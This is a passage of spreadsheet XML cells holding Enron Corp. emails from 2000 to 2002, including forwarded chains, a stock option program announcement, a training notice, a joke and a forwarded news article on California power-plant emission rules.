be receiving in the near future.? Upon receipt of  these invoices, if you _x000D_
have any questions, you may contact Ann Ross  (IEP's external accountant) at _x000D_
916/635-1424 or me.?  _x000D_
?_x000D_
?</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 08:34:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.kloehr@entergykoch.com'})</t>
  </si>
  <si>
    <t>RE: We made the big time</t>
  </si>
  <si>
    <t xml:space="preserve">Hey,_x000D_
_x000D_
Are you officially an employee of the new company ?  If so when are they_x000D_
going to start flowing gas again?  I tried execute the attached file but was_x000D_
unable.  What was it?  Anything else going on?_x000D_
_x000D_
jk_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Keiser, Kam [SMTP:Kam.Keiser@ENRON.com]_x000D_
&gt; Sent:	Friday, January 25, 2002 9:04 AM_x000D_
&gt; To:	james.kloehr@entergykoch.com_x000D_
&gt; Subject:	FW: We made the big time_x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Palmer, B. Scott _x000D_
&gt; Sent: Friday, January 25, 2002 9:02 AM_x000D_
&gt; To: Gossett, Jeffrey C.; Keiser, Kam; Giron, Darron C.; Mills, Bruce;_x000D_
&gt; Love, Phillip M.; McLaughlin Jr., Errol; Valdes, John_x000D_
&gt; Subject: FW: We made the big time_x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Palmer, Sarah _x000D_
&gt; Sent: Thursday, January 24, 2002 2:03 PM_x000D_
&gt; To: Palmer, B. Scott_x000D_
&gt; Subject: FW: We made the big time_x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; _x000D_
&gt; **********************************************************************_x000D_
&gt; This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
&gt; and may contain confidential and privileged material for the sole use of_x000D_
&gt; the intended recipient (s). Any review, use, distribution or disclosure by_x000D_
&gt; others is strictly prohibited. If you are not the intended recipient (or_x000D_
&gt; authorized to receive for the recipient), please contact the sender or_x000D_
&gt; reply to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
&gt; delete all copies of the message. This e-mail (and any attachments hereto)_x000D_
&gt; are not intended to be an offer (or an acceptance) and do not create or_x000D_
&gt; evidence a binding and enforceable contract between Enron Corp. (or any of_x000D_
&gt; its affiliates) and the intended recipient or any other party, and may not_x000D_
&gt; be relied on by anyone as the basis of a contract by estoppel or_x000D_
&gt; otherwise. Thank you. _x000D_
&gt; **********************************************************************_x000D_
&gt;  &lt;&lt; File: Enron-Ron-Ron.mp3 &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 06:42:48 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Applicant</t>
  </si>
  <si>
    <t>Actually, he's from Enron (thus the question).  I saw some of that in the_x000D_
paper.  Unbelievable (agreed)._x000D_
_x000D_
-----Original Message-----_x000D_
From: Parks, Joe [mailto:Joe.Parks@enron.com]_x000D_
Sent: Tuesday, February 05, 2002 8:34 AM_x000D_
To: Fenner, Chet_x000D_
Subject: RE: Applicant_x000D_
_x000D_
_x000D_
ISNT ANDERSON YOUR AUDITOR? IS THAT A CONFLICT?_x000D_
_x000D_
YOU SHOULD READ SOME OF THE POWERS REPORT. UNBELIEVEABLE!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Fenner, Chet [mailto:Chet_Fenner@bmc.com]_x000D_
Sent: Tuesday, February 05, 2002 8:33 AM_x000D_
To: Parks, Joe_x000D_
Subject: RE: Applicant_x000D_
_x000D_
_x000D_
My buddy up here knew a guy he had listed as a reference from Andersen, so_x000D_
we got the inside scoop._x000D_
_x000D_
Any prospects out there?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Parks, Joe [mailto:Joe.Parks@enron.com]_x000D_
Sent: Tuesday, February 05, 2002 8:16 AM_x000D_
To: Fenner, Chet_x000D_
Subject: RE: Applicant_x000D_
_x000D_
_x000D_
dont know who that is. i can find out if you want me too. I know a few_x000D_
people in RAC. things arround here still suck. i am doing a little stock_x000D_
trading and trying to find a job. basically doing the bare minimum to keep_x000D_
the paycheck_x000D_
_x000D_
-----Original Message-----_x000D_
From: Fenner, Chet [mailto:Chet_Fenner@bmc.com]_x000D_
Sent: Monday, February 04, 2002 5:30 PM_x000D_
To: Parks, Joe; 'jparks1@houston.rr.com'_x000D_
Subject: Applicant_x000D_
_x000D_
_x000D_
Do you know of a Chris Gray?  Probably a long-shot, but he worked at Enron_x000D_
in the Risk Assessment and Control group._x000D_
_x000D_
What's up w/ you?  What's the latest?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 _x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 10:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jean.mrha@enron.com', 'jeff.donahue@enron.com', 'c.thompson@enron.com', 'brian.redmond@enron.com', 'christopher.calger@enron.com', 'max.yzaguirre@enron.com', 'janet.dietrich@enron.com', 'w.duran@enron.com', 'rob.milnthorp@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>Q4 Plan</t>
  </si>
  <si>
    <t xml:space="preserve">Guys, attached you will find the final plan to meet our origination targets _x000D_
for Q4 consistent with our discussions.  It is important that we hit our _x000D_
numbers in order for Enron to meet its targets for the year._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 14:59:34 -0800 (PST)</t>
  </si>
  <si>
    <t>The QBeez need you - rescue them in this FREE demo game!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 Unsubscribe at bottom  	_x000D_
[IMAGE]  	_x000D_
 [IMAGE]  Find  out before it's too late.   Download the free demo of this hot new game  today!  [IMAGE]   	_x000D_
 	_x000D_
[IMAGE]  [IMAGE] 	_x000D_
 	_x000D_
 remove me                    privacy  policy   [IMAGE]  You received this e-mail because you downloaded a  RealPlayer(R), RealJukebox(R), or another product from Real.com(TM) and indicated a preference to receive special offers from RealNetworks(R), or you subscribed to the  Special Offers e-mail category in your account area. If you do not wish to receive e-mails from us in the future, click on the "remove me" link above.  RealNetworks, RealPlayer, RealJukebox, Real.com, and  RealArcade are trademarks or registered trademarks of  RealNetworks, Inc. All other companies or products listed herein are trademarks or registered trademarks of their  respective owners.   	_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Jan 2001 08:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve"> I couldn't schedule my car appointment for Sat.  They were booked.  So I had _x000D_
to schedule it for Monday, and you'll love this.  I need to have it there by _x000D_
9am!!  So, if you're still willing to take me to drop it off I'll buy you _x000D_
breakfast and then we can go home and take naps.  _x000D_
_x000D_
I'm leaving now.   Goodnight._x000D_
_x000D_
Robin</t>
  </si>
  <si>
    <t>Thu, 24 Feb 2000 01:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brenda.flores-cuellar@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'lauri.allen@enron.com', 'dan.junek@enron.com', 'jared.kaiser@enron.com', 'judy.townsend@enron.com', 'daren.farmer@enron.com', 'edward.gottlob@enron.com'})</t>
  </si>
  <si>
    <t>RE: Options Training Classes</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
I am currently out of books.  I should be getting some more in today.  As _x000D_
soon as they come in, I will make sure you get a copy._x000D_
_x000D_
-Brenda_x000D_
_x000D_
---------------------- Forwarded by Brenda Flores-Cuellar/HOU/ECT on _x000D_
02/23/2000 04:26 PM ---------------------------_x000D_
To: Phillip K Allen/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT, Sandra F _x000D_
Brawner/HOU/ECT@ECT, Mike Grigsby/HOU/ECT@ECT, Keith Holst/HOU/ECT@ect, Brian _x000D_
Hoskins/HOU/ECT@ECT, Dick Jenkins/HOU/ECT@ECT, Peter F Keavey/HOU/ECT@ECT, _x000D_
Matthew Lenhart/HOU/ECT@ECT, Andrew H Lewis/HOU/ECT@ECT, Thomas A _x000D_
Martin/HOU/ECT@ECT, Greg McClendon/HOU/ECT@ECT, Brad McKay/HOU/ECT@ECT, Carey _x000D_
M Metz/HOU/ECT@ECT, Sarah Mulholland/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, Eva _x000D_
Pao/HOU/ECT@ECT, Jim Schwieger/HOU/ECT@ECT, Elizabeth Shim/Corp/Enron@Enron, _x000D_
Hunter S Shively/HOU/ECT@ECT, Geoff Storey/HOU/ECT@ECT, Fletcher J _x000D_
Sturm/HOU/ECT@ECT, Patricia Tlapek/HOU/ECT@ECT_x000D_
cc: Shirley Crenshaw/HOU/ECT@ECT _x000D_
Subject: RE: Options Training Classes_x000D_
_x000D_
For those of you who did not see the memos from Jeff that went out on _x000D_
February 17th. &amp; February 22nd. regarding the upcoming Options training _x000D_
classed, I have attached both memos below:_x000D_
_x000D_
_x000D_
_x000D_
I have the books at my desk for those of you that have not received your _x000D_
copy.  _x000D_
_x000D_
There will be a third memo in the next couple of days with regards to the _x000D_
location of the classes._x000D_
_x000D_
If you have any other questions, please feel free to contact me._x000D_
_x000D_
-Brenda_x000D_
x31914_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 07:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Conference Call - eNovate Legal Templates Masters, LC and_x000D_
 Guarantees</t>
  </si>
  <si>
    <t xml:space="preserve">I found it._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/16/2000 02:02 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Dorothy Youngblood@ECT_x000D_
10/12/2000 05:21 PM_x000D_
To: Molly Harris/HOU/ECT@ECT, Gregg.Penman@enron.com, Jeffrey T _x000D_
Hodge/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Kay Mann/Corp/Enron@Enron_x000D_
cc: Suzanne Adams/HOU/ECT@ECT, Kaye Ellis/HOU/ECT@ECT, _x000D_
Lynn.pikofsky@enron.com _x000D_
_x000D_
Subject: Conference Call - eNovate Legal Templates Masters, LC and Guarantees_x000D_
_x000D_
_x000D_
_x000D_
This memo will confirm the above referenced Conference Call has been arranged _x000D_
for the date/time listed below:_x000D_
_x000D_
_x000D_
 DATE:   Monday, 10/16/2000_x000D_
_x000D_
 TIME:   2:00  P.M.- 3:00 P.M._x000D_
_x000D_
 DIAL-IN NUMBER: 1-888-422-7109_x000D_
_x000D_
 HOST CODE:  409-555_x000D_
_x000D_
 PARTICIPANTS _x000D_
  CODE:  381-755_x000D_
_x000D_
_x000D_
_x000D_
Please let us know if there are any questions._x000D_
_x000D_
Thanks you._x000D_
_x000D_
Dorothy_x000D_
_x000D_
713-853-6114 _x000D_
_x000D_
_x000D_
_x000D_
Participants:_x000D_
_x000D_
  Molly Harris - Host of Conference Call_x000D_
  Gregg Penman_x000D_
  Jeff Hodge_x000D_
  Sara Shackelton_x000D_
  Kay Mann_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 05:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'laura.vargas@enron.com', 'kori.loibl@enron.com', 'sherry.dawson@enron.com', 'errol.mclaughlin@enron.com', 'dutch.quigley@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Married for only two weeks!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Susan M Scott/HOU/ECT on 08/28/2000 12:41 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Ted Noble_x000D_
08/28/2000 12:34 PM_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fwd: Married for only two weeks!_x000D_
_x000D_
This is pretty good._x000D_
_x000D_
---------------------- Forwarded by Ted Noble/HOU/ECT on 08/28/2000 12:33 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Fritz Noble" &lt;fritznoble@hotmail.com&gt; on 08/28/2000 11:38:50 AM_x000D_
To: jboyd@cbrichardellis.com, dallasymca@aol.com, dwakumoto@yahoo.com, _x000D_
sam2@bluemarble.net, flyingace1965@earthlink.net, ted.noble@enron.com, _x000D_
bigv@silcom.com_x000D_
cc:  _x000D_
Subject: Fwd: Married for only two weeks!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;From: CarTayBri@aol.com_x000D_
&gt;To: FritzNoble@hotmail.com_x000D_
&gt;Subject: Married for only two weeks!_x000D_
&gt;Date: Sun, 27 Aug 2000 18:17:42 EDT_x000D_
&gt;_x000D_
&gt;This couple had only been married for two weeks._x000D_
&gt;_x000D_
&gt;The husband, although very much in love, couldn't wait to go out into town_x000D_
&gt;and party with his old buddies, so he says to his new wife, "Honey, I'll be_x000D_
&gt;right back..."_x000D_
&gt;_x000D_
&gt;"Where are you going coochy cooh...?" asked the wife._x000D_
&gt;_x000D_
&gt;"I'm going to the bar, pretty face. I'm going to have a beer."_x000D_
&gt;_x000D_
&gt;The wife says to him, "You want a beer my love?"_x000D_
&gt;Then she opens the door to the refrigerator and shows him 25 different_x000D_
&gt;kinds_x000D_
&gt;of beer brands from 12 different countries: Germany, Holland, Japan, India,_x000D_
&gt;etc._x000D_
&gt;_x000D_
&gt;The husband doesn't know what to do, and the only thing that he can think_x000D_
&gt;of_x000D_
&gt;saying is,_x000D_
&gt;"Yes, loolie loolie...but the bar.... you know...the frozen glass..."_x000D_
&gt;_x000D_
&gt;He didn't get to finish the sentence, when the wife interrupts him by_x000D_
&gt;saying,_x000D_
&gt;"You want a frozen glass puppy face?" She takes a huge beer mug out of the_x000D_
&gt;freezer so frozen that she was getting chills holding it._x000D_
&gt;_x000D_
&gt;The husband, looking a bit pale, says, "Yes, tootsie roll, but at the bar_x000D_
&gt;they have those hors d'oeuvres that are really delicious... I won't be_x000D_
&gt;long._x000D_
&gt;I'll be right back. I promise. OK?"_x000D_
&gt;_x000D_
&gt;"You want hors d'oeuvres poochi pooh?" She opens the oven and takes out 15_x000D_
&gt;dishes of different hors d'oeuvres: chicken wings, pigs in a blanket,_x000D_
&gt;mushroom caps, porkstrips, etc._x000D_
&gt;_x000D_
&gt;"But sweet honey...at the bar...you know...the swearing, the dirty words_x000D_
&gt;and_x000D_
&gt;all that..."_x000D_
&gt;_x000D_
&gt;"You want dirty words cutie pie?..._x000D_
&gt;HERE, DRINK YOUR FUCKING BEER IN YOUR FROZEN FUCKING MUG AND EAT YOUR_x000D_
&gt;FUCKING_x000D_
&gt;SNACKS, BECAUSE YOU AREN'T GOING ANYWHERE! GOT IT ASSHOLE?!!"_x000D_
_x000D_
__________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com._x000D_
_x000D_
Share information about yourself, create your own public profile at_x000D_
http://profiles.msn.com._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 Oct 2001 11:03:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wellhead Desk_x000D_
_x000D_
Can you please send Jean a list of the 9 people.</t>
  </si>
  <si>
    <t>Thu, 29 Jun 2000 04:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'esop.a.@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">It is amazing and yet not surprising how much Enron has accomplished in the=_x000D_
=20_x000D_
first six months of this year. You continue to make it happen.  We recogniz=_x000D_
e=20_x000D_
that you work hard every day to accomplish Enron=01,s business goals, and w=_x000D_
e are=20_x000D_
pleased that many of you have shared in the company=01,s financial success=_x000D_
=20_x000D_
through Enron stock options.=20_x000D_
_x000D_
As you may know, the current employee stock option program (also known as t=_x000D_
he=20_x000D_
All Employee Stock Option Program or AESOP) began in 1994 and provided valu=_x000D_
e=20_x000D_
to participants through 2000.  Employees who have participated in this=20_x000D_
program from its inception have realized a 1,119% increase in the value of=_x000D_
=20_x000D_
their stock options (assuming a stock price of $70) over the life of the=20_x000D_
program.  =20_x000D_
_x000D_
Enron stock options are a valuable part of your total compensation package=_x000D_
=20_x000D_
and a contributing factor to your performance and to Enron=01,s continued=_x000D_
=20_x000D_
success.  Therefore, the Enron Executive Committee and the Compensation and=_x000D_
=20_x000D_
Management Development Committee of the Enron Board of Directors have decid=_x000D_
ed=20_x000D_
to continue to offer stock options as a part of your compensation package._x000D_
_x000D_
On May 1, 2000, the Committee approved an employee stock option program for=_x000D_
=20_x000D_
calendar years 2001 - 2005 (EnronOptions =01) Your Stock Option Program).  =_x000D_
It is=20_x000D_
expected that EnronOptions =01) Your Stock Option Program will be granted,=_x000D_
=20_x000D_
effective on or about December 29, 2000, for those employees who are eligib=_x000D_
le=20_x000D_
on that date (please see note below).  The new program, which is subject to=_x000D_
=20_x000D_
final approval by Enron=01,s Board of Directors, is as follows:_x000D_
_x000D_
? EnronOptions =01) Your Stock Option Program will give stock options to=20_x000D_
eligible full-time and part-time regular employees in domestic and=20_x000D_
international companies/locations._x000D_
? The grant of non-qualified stock options will equal 25% of annual base=20_x000D_
salary (5% of annual base salary for each year of a 5-year period) on=20_x000D_
December 29, 2000. (Salary calculation and value may vary in some=20_x000D_
international locations.)_x000D_
? The Board will grant the stock options on December 29, 2000._x000D_
? Eligible employees hired in subsequent years will receive a prorated gran=_x000D_
t=20_x000D_
of stock options._x000D_
_x000D_
Why commit your talent and energy to Enron?  EnronOptions =01) Your Stock O=_x000D_
ption=20_x000D_
Program, among other good reasons=01( that=01,s why._x000D_
_x000D_
In the coming weeks, you will be receiving more details about EnronOptions =_x000D_
=01)=20_x000D_
Your Stock Option Program.  To provide information and answer your question=_x000D_
s,=20_x000D_
we will introduce a special link on the Human Resources web-site, host=20_x000D_
several eSpeak sessions and continue to communicate with you on a regular=_x000D_
=20_x000D_
basis.  In the meantime, if you have immediate questions, please contact yo=_x000D_
ur=20_x000D_
Human Resources representative.=20_x000D_
_x000D_
Note: In addition to final approval by Enron=01,s Board of Directors, grant=_x000D_
ing=20_x000D_
of options will be subject to New York Stock Exchange and state and federal=_x000D_
=20_x000D_
regulatory requirements.  It is expected that EnronOptions =01) Your Stock=_x000D_
=20_x000D_
Option Program will be available to most Enron employees; however, some Enr=_x000D_
on=20_x000D_
companies=01, employees may not be eligible due to legal, accounting, tax, =_x000D_
labor=20_x000D_
or business issues.  As you know, Enron changes to meet the needs of the=20_x000D_
marketplaces we serve.  Given that need to change, we will continue to refi=_x000D_
ne=20_x000D_
the eligibility for EnronOptions =01) Your Stock Option Program and will=20_x000D_
communicate more details throughout the year with final eligibility being=_x000D_
=20_x000D_
determined on December 29, 2000. </t>
  </si>
  <si>
    <t>Mon, 18 Jun 2001 18:33:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ray.alvarez@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'm..driscoll@enron.com', 'chris.mallory@enron.com', 'timothy.heizenrader@enron.com', 'robert.badeer@enron.com', 'dave.perrino@enron.com', 'steve.swain@enron.com', 'f..calger@enron.com', 'chris.stokley@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'jeff.richter@enron.com', 'bill.williams@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'phillip.platter@enron.com', 'diana.scholtes@enron.com', 'greg.wolfe@enron.com', 'matt.motley@enron.com', 'mark.guzman@enron.com', 'elliot.mainzer@enron.com', 'jeff.dasovich@enron.com', 'c..hall@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>FW: FW: Davis Eases Power Plant Pollution Rules</t>
  </si>
  <si>
    <t xml:space="preserve">Here is information on the ability of CA generators to run in excess of the=_x000D_
ir orginal offset NOx quantities._x000D_
_x000D_
Alan Comnes_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Schoen, Mary =20_x000D_
Sent:=09Monday, June 18, 2001 3:23 PM_x000D_
To:=09Comnes, Alan_x000D_
Cc:=09Guerrero, Janel_x000D_
Subject:=09Re: FW: Davis Eases Power Plant Pollution Rules_x000D_
_x000D_
The following is more explanation about the recent Executive Order (EO) sig=_x000D_
ned by the Governor of California on June 11, 2001.  In order to avoid futu=_x000D_
re blackouts, Governor Gray Davis is waiving limits on hours of operation a=_x000D_
nd the associated emissions for natural gas-fired peaker units if they adhe=_x000D_
re to certain conditions.  He is requesting local air districts to allow na=_x000D_
tural gas-fired peaker power plants to operate in excess of their hourly, d=_x000D_
aily, quarterly and/or annual emission limitations if they do the following=_x000D_
:_x000D_
_x000D_
1.=09Agree to sell power to the California Department of Water Resources or=_x000D_
 to a utility located in California=20_x000D_
2.=09To serve an operating utility's own load_x000D_
3.=09Agree to sell to another California-based utility_x000D_
_x000D_
The gas-fired peaker units must also pay a mitigation fee to the local air =_x000D_
districts of $7.50 per pound of oxides of nitrogen (NOx) and $1.10 per poun=_x000D_
d of carbon monoxide (CO) emitted.  (The Governor set this number - it is, =_x000D_
however, the same amount the South Coast AQMD is charging for NOx offsets i=_x000D_
n the modifications it made to the RECLAIM program.) These mitigation fees =_x000D_
will be used to clean up or retire other sources of pollution in the same a=_x000D_
ir basin.  The Governor is ordering the California Air Resources Board to w=_x000D_
ork with the Environmental Protection Agency to ensure that power plants wi=_x000D_
lling to operate under this order obtain the necessary approvals._x000D_
_x000D_
As you know, there are many peaking plants that are close to exhausting the=_x000D_
ir allowable operating hours.  Once these facilities exhaust the amount of =_x000D_
allowable hours they would have to either shut down the units or negotiate =_x000D_
an agreement with the local air agency to continue to operate.  With the ex=_x000D_
ception of Mirant Potrero in San Francisco and Reliant Energy Mandalay in V=_x000D_
entura County, no facilities have negotiated such agreements.  The EO issue=_x000D_
d by the Governor gives the peaker facilities a blanket approval to operate=_x000D_
 beyond the restrictions.  The Governor believes that waiving of the requir=_x000D_
ements will also minimize reliance on backup diesel-fired generators, which=_x000D_
 have even higher emissions than the natural gas peakers.  In my previous d=_x000D_
iscussions with the US EPA Region 9, they did say they were willing to work=_x000D_
 with the state to provide variances to power plants' operating limits.  Ho=_x000D_
wever,  in the two instances mentioned above, the EPA required the plants t=_x000D_
o agree to install pollution control equipment at a specific future date.  =_x000D_
This aspect of the agreement was critical to EPA, because the increased emi=_x000D_
ssions from the peakers with increased hours are now significant enough (ma=_x000D_
jor source status) to trigger New Source Review which requires installation=_x000D_
 of Best Available Control Technology (BACT).  The EO by the Governor makes=_x000D_
 no mention of future controls._x000D_
_x000D_
According to municipal utilities and other generators, the Governor's actio=_x000D_
n could provide up to 1,200 Megawatts of additional power this summer by ex=_x000D_
panding the number of hours of operation at natural gas-fired plants.   The=_x000D_
 EO will expire on October 31, 2001, unless revoked, modified or extended b=_x000D_
y further executive order.  The air director of the Ventura air board has a=_x000D_
lready sent comments opposing this order due to its negative air impacts.  =_x000D_
Environmentalists will also no doubt object.  The EPA has not yet responded=_x000D_
.  Despite the potential negative environmental effects, the political pres=_x000D_
sure will be strong to let these plants operate.  I will keep my ears open =_x000D_
for additional developments on this matter, please let me know if you have =_x000D_
any questions._x000D_
_x000D_
_x000D_
_x000D_
From:=09Alan Comnes/ENRON@enronXgate on 06/12/2001 11:57 AM_x000D_
To:=09Mary Schoen/NA/Enron@Enron_x000D_
cc:=09=20_x000D_
_x000D_
Subject:=09FW: Davis Eases Power Plant Pollution Rules=20_x000D_
_x000D_
_x000D_
Mary,_x000D_
_x000D_
Any insight into this latest change would be appreciated by the traders.  I=_x000D_
s this order any different than the SCAQMD $7.50/ton program already implem=_x000D_
ented?  Will EPA allow that state to do this?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Alan Comnes_x000D_
 -----Original Message-----_x000D_
From: =09Comnes, Alan =20_x000D_
Sent:=09Tuesday, June 12, 2001 9:55 AM_x000D_
To:=09Alonso, Tom; Alvarez, Ray; Badeer, Robert; Belden, Tim; Calger, Chris=_x000D_
topher F.; Dasovich, Jeff; Driscoll, Michael M.; Fischer, Mark; Foster, Chr=_x000D_
is H.; Guzman, Mark; Hall, Steve C.; Heizenrader, Timothy; Kaufman, Paul; M=_x000D_
ainzer, Elliot; Mallory, Chris; Mara, Susan; Motley, Matt; Perrino, Dave; P=_x000D_
latter, Phillip; Richter, Jeff; Scholtes, Diana; Swain, Steve; Swerzbin, Mi=_x000D_
ke; Williams III, Bill; Wolfe, Greg_x000D_
Subject:=09Davis Eases Power Plant Pollution Rules=20_x000D_
_x000D_
_x000D_
=20_x000D_
Tuesday, June 12, 2001=20_x000D_
Davis Eases Power Plant Pollution Rules=20_x000D_
 Electricity: Order will allow more production from heavily polluting 'peak=_x000D_
er' facilities.=20_x000D_
_x000D_
_x000D_
By DAN MORAIN, Times Staff Writer_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
     SACRAMENTO--Gov. Gray Davis agreed Monday to lift air emission limits =_x000D_
on heavily polluting power plants and allow them to run at capacity this su=_x000D_
mmer as long as the electricity they produce is sold in the state.=20_x000D_
     State officials said the plants must be pressed into use to avoid blac=_x000D_
kouts.=20_x000D_
     Davis' executive order lets the generators build the cost of air pollu=_x000D_
tion fines into the price the state pays for electricity produced by natura=_x000D_
l gas-fired power plants, said Catherine Witherspoon of the California Air =_x000D_
Resources Board.=20_x000D_
     Municipal utility districts--including the Los Angeles Department of W=_x000D_
ater and Power--and independent power companies could supply as much as 1,2=_x000D_
00 megawatts from so-called peaker plants, facilities that generally are pe=_x000D_
rmitted to operate for only a few hundred hours a year because they pollute=_x000D_
 so heavily. That is enough power for more than 1 million homes.=20_x000D_
     Other gas-fired power plants that have been shut down because of air p=_x000D_
ollution restrictions also could be started up as a result of the order.=20_x000D_
     In a news conference Monday, state officials said the order will have =_x000D_
the effect of lowering air pollution by limiting the use of far dirtier die=_x000D_
sel generators, which industry could use if power supplies are threatened.=_x000D_
=20_x000D_
     "If we don't get every last megawatt we can [from natural gas-fired pl=_x000D_
ants]," said Witherspoon of the air board, "we will see people turning to d=_x000D_
iesel more frequently."=20_x000D_
     Added Kellan Fluckiger, a top energy advisor to Davis: "If you don't r=_x000D_
un these, you're either going to have outages or you're going to run someth=_x000D_
ing dirtier."=20_x000D_
     Fluckiger said the order expands "the number of hours these things can=_x000D_
 run and the amount of energy they can produce."=20_x000D_
     New natural gas-fired power plants emit about half a pound per megawat=_x000D_
t-hour of operation of ozone-producing pollutants. The plants affected by t=_x000D_
he order emit between two and five pounds of oxides of nitrogen per megawat=_x000D_
t-hour.=20_x000D_
     If the plants are pressed into operation for 200,000 megawatt-hours th=_x000D_
is summer, there will be between 400,000 and 1 million additional pounds of=_x000D_
 oxides of nitrogen emitted into the air.=20_x000D_
     The state probably will end up paying the fees associated with the ext=_x000D_
ra pollution through higher electricity prices. The fees amount to $7.50 pe=_x000D_
r pound of oxides of nitrogen--or $7.5 million if the plants operate for 20=_x000D_
0,000 hours--and $1.10 per pound of carbon monoxide emissions. The money wo=_x000D_
uld be used to reduce air pollution from other sources.=20_x000D_
     "Under this order, dirty power plants can run as long as they want and=_x000D_
 pollute as much as they want so long as they pay into a fund," said Gail R=_x000D_
uderman Feuer, senior attorney with the Natural Resources Defense Council. =_x000D_
"Our concern is that there's no guarantee that the fund will result in emis=_x000D_
sion reductions any time soon."=20_x000D_
     A Ventura County air pollution control official said that running one =_x000D_
peaking power plant operated by Reliant Energy for one hour is the equivale=_x000D_
nt of adding 20,000 new cars to Ventura County highways for an hour. Relian=_x000D_
t Energy could not be reached for comment Monday night.=20_x000D_
     "To the extent that they run when not needed for an emergency, it's go=_x000D_
ing to put more air pollution into Ventura County skies and it's going to m=_x000D_
ake our air dirtier," said Dick Baldwin, air pollution control officer for =_x000D_
Ventura County.=20_x000D_
     Los Angeles DWP Director David Wiggs hailed the order, saying it was n=_x000D_
eeded so the city can sell the state as much as 1,000 megawatts of power th=_x000D_
is summer.=20_x000D_
     "This was the issue we had to have solved or we could not offer any of=_x000D_
 our excess capacity to the state," Wiggs said.=20_x000D_
     He added, however, that the city and state have not yet agreed on a pr=_x000D_
ice for the power. Wiggs said the city is "negotiating to get our cost as l=_x000D_
ow as we can legally charge" so that customers of the city utility district=_x000D_
 are not subsidizing consumers in the rest of the state. Municipal utility =_x000D_
districts elsewhere in the state also are expected to benefit from the orde=_x000D_
r.=20_x000D_
     Though the order was aimed at spurring municipal utilities to sell pow=_x000D_
er to the state, it also applies to independent power producers such as Rel=_x000D_
iant Energy of Houston and Duke of North Carolina--both of which have calle=_x000D_
d on Davis to ease air pollution restrictions on their old natural gas-fire=_x000D_
d facilities.=20_x000D_
     "This puts more money in the Texans' pockets and more air pollution in=_x000D_
 Ventura County residents' lungs," said Baldwin of Ventura County.=20_x000D_
     Doug Allard, a Santa Barbara County air pollution control officer, als=_x000D_
o said it seems as if the governor is giving private power generators much =_x000D_
of what they had sought.=20_x000D_
     "We have serious concerns about the order," said Feuer of the Natural =_x000D_
Resources Defense Council. "It's taking the discretion away from local air =_x000D_
districts to regulate power plants in their region."=20_x000D_
_x000D_
_x000D_
* * *_x000D_
     Times staff writer Nancy Vogel contributed to this story.=20_x000D_
     RELATED STORY=20_x000D_
     Utility: Edison plans to raise $1 billion in debt restructuring. C1=20_x000D_
Copyright 2001 Los Angeles Times =20_x000D_
_x000D_
_x000D_
=20_x000D_
_x000D_
 =20_x000D_
=20_x000D_
=20_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Jun 2000 04:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: CA Data Sheet</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Gerald:  Nothing with or relating to Questar Regulated Services to the _x000D_
best of my knowledge._x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
	Gerald Nemec_x000D_
	06/13/2000 10:29 AM_x000D_
